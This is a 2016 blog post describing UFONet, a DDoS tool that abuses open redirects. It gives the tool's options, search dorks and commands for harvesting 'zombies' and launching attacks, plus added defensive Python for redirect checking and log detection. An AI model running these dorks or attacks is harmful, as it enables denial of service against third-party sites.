UFONet – Open Redirect DDoS Tool

Datetime: 2016-08-22 21:39:33          Topic: DDOS

UFONet is an open redirect DDoS tool designed to launch attacks against a target by using insecure redirects in third-party web applications as if they were a botnet. Obviously, only for testing purposes.

The tool abuses OSI Layer 7 (HTTP) to create and manage ‘zombies’ and to conduct different attacks using GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.

Definition of an “Open Redirect”:

An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.

From: CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
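The CWE-601 pattern next to a hardened check, as an added example (not code from UFONet or from the original page). The allowlisted hosts and the `/` fallback are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for this example: hosts the application may redirect to.
ALLOWED_HOSTS = {"www.example.com", "accounts.example.com"}
FALLBACK = "/"

def vulnerable_redirect_target(param):
    """The CWE-601 pattern: the parameter value becomes the Location as-is."""
    return param

def safe_redirect_target(param, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return a redirect target that stays on-site or on an allowlisted host."""
    if not param:
        return fallback
    # Browsers treat backslashes like slashes and drop control characters,
    # so reject both instead of trying to normalise them.
    if "\\" in param or any(ord(c) < 0x20 or ord(c) == 0x7F for c in param):
        return fallback
    try:
        parts = urlsplit(param)
    except ValueError:
        return fallback
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept only a single-slash absolute path.
        if param.startswith("/") and not param.startswith("//"):
            return param
        return fallback
    if parts.scheme not in ("http", "https"):
        return fallback
    # .hostname drops userinfo and port, so "trusted@other" resolves to "other".
    if parts.hostname and parts.hostname.lower() in allowed_hosts:
        return param
    return fallback
```
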

Usage

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

Searching for ‘Zombies’

UFONet can search the results of different search engines to find sites that may be vulnerable to ‘Open Redirect’. Common query strings look like this:

        'proxy.php?url='
        'check.cgi?url='
        'checklink?uri='
        'validator?uri='

For example you can begin a search with:

      ./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

      ./ufonet --sd 'dorks.txt'

By default, UFONet uses a search engine called ‘duck’, but you can choose a different one:

      ./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines, with the date each was last confirmed working:

        - duck [07/10/2015: OK!]
        - google [07/10/2015: OK!]
        - bing [07/10/2015: OK!]
        - yahoo [07/10/2015: OK!]
        - yandex [07/10/2015: OK!]

You can also search massively using all supported search engines:

      ./ufonet -s 'proxy.php?url=' --sa 

To control how many ‘zombies’ you receive from search engines, you can use:

      ./ufonet --sd 'dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the retrieved list to see if the URLs are vulnerable.

      Wanna check if they are valid zombies? (Y/n)

You will also be asked whether to update the list, automatically adding only ‘vulnerable’ web apps.

      Wanna update your list (Y/n)

If you reply ‘Y’, your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

    + with verbose:    ./ufonet -s 'proxy.php?url=' -v
    + with threads:    ./ufonet --sd 'dorks.txt' --sa --threads 100
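For site owners, the query strings listed above are also what to look for in their own access logs. This added example (not part of UFONet or the original page) counts requests whose `url=`/`uri=` parameter points at a host the site does not own; it generalises from the four listed endpoints to any path using those parameter names. The log lines, hosts and threshold are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the query strings listed above.
URL_PARAMS = ("url", "uri")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; every host and IP address here is a placeholder.
SAMPLE_LOG = """\
198.51.100.7 - - [22/Aug/2016:21:39:01 +0000] "GET /proxy.php?url=http://third-party.example/big.jpg HTTP/1.1" 200 512
198.51.100.8 - - [22/Aug/2016:21:39:01 +0000] "GET /proxy.php?url=http%3A%2F%2Fthird-party.example%2Fbig.jpg HTTP/1.1" 200 512
198.51.100.9 - - [22/Aug/2016:21:39:02 +0000] "GET /checklink?uri=http://third-party.example/big.jpg HTTP/1.1" 200 512
198.51.100.7 - - [22/Aug/2016:21:39:02 +0000] "GET /validator?uri=http://THIRD-PARTY.example/big.jpg HTTP/1.1" 200 512
192.0.2.10 - - [22/Aug/2016:21:40:10 +0000] "GET /checklink?uri=http://www.example.org/about HTTP/1.1" 200 900
192.0.2.11 - - [22/Aug/2016:21:41:00 +0000] "GET /validator?uri=https://other.example/ HTTP/1.1" 200 700
192.0.2.12 - - [22/Aug/2016:21:41:30 +0000] "GET /index.html HTTP/1.1" 200 1200
"""

def external_fetch_targets(log_text, own_hosts):
    """Count requests whose url=/uri= value names a host we do not own."""
    hits = Counter()
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so encoded and plain values are treated alike.
        params = parse_qs(urlsplit(m.group(1)).query)
        for name in URL_PARAMS:
            for value in params.get(name, []):
                try:
                    host = urlsplit(value).hostname
                except ValueError:
                    continue  # malformed URL value, nothing to attribute
                if host and host.lower() not in own_hosts:
                    hits[host.lower()] += 1
    return hits

def flag_abuse(log_text, own_hosts, threshold=3):
    """Return external hosts requested at least `threshold` times via our endpoints."""
    counts = external_fetch_targets(log_text, own_hosts)
    return {host: n for host, n in counts.items() if n >= threshold}
```
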

You can download UFOnet here:

git clone https://github.com/epsylon/ufonet
